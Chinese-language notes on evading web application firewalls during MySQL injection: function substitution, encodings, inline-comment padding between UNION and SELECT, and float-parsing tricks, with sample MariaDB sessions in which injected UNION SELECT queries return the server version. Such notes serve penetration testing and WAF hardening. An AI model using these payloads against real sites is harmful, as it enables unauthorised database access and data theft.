参考:
https://mp.weixin.qq.com/s/Qn-zh7SwG9wA3dGEz_AEqA
绕各类WAF是渗透测试人员的一项基本技能。WAF分为
- 云WAF(如 加速乐)
- 硬件WAF(如 绿盟WAF)
- 软件WAF(如 安全狗)
- 代码级WAF
mysql注入
关键字替换。
如在mysql中,WAF将sleep()函数加入黑名单,可以用具备相似功能的benchmark()
函数实现绕过。部分相似功能的替代函数:
< > 等价于 BETWEEN
= 等价于 like
hex() bin() 等价于ascii()
sleep() 等价于 benchmark()
mid() substring() 等价于 substr()
@@user 等价于 User()
@@Version 等价于 version()
(mysql支持&& || ,oracle不支持 && ||)
特殊符号
结合不同数据库的特性差别来实现绕过(最好是可以找到WAF开发者都不了解的某些特性)
比如“`”放在mysql的末尾会起到注释符的作用。
编码
可以结合各种编码方式,比如url编码,url双重,多重编码,hex编码,unicode编码,数据库编码等。
注释符
/blahblah/是注释,也可以充当空白符。因为//可以使得mysql对sql语句union/**/select
词法解析成功。其实许多WAF也考虑到了//可以作为空白分割,但是WAF检测/\*.*\*/
很消耗性能,工程师会折中,可能在检测中间引入一些特殊字符,例如:/*\w+*/
。或者,WAF可能只检查n个字符/\*.{,n}\*/
。可逐步测试长度来绕过:
方法:先测试最基本的union/**/select
再测试中间引入的特殊字,最后测试注释长度:
union/*aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa*/select
浮点数词法解析
利用mysql解析浮点数的特点,正则表达式无法匹配出单词union,
MariaDB [ultrax]> select email from pre_ucenter_members where uid=1E0UNion select @@version;
+--------------------------+
| email |
+--------------------------+
| xxx@yyymail.com |
| 10.1.23-MariaDB-9+deb9u1 |
+--------------------------+
2 rows in set (0.00 sec)
MariaDB [ultrax]> select email from pre_ucenter_members where uid=1.0UNion select @@version;
+--------------------------+
| email |
+--------------------------+
| xxx@yyy.com |
| 10.1.23-MariaDB-9+deb9u1 |
+--------------------------+
2 rows in set (0.00 sec)
//TODO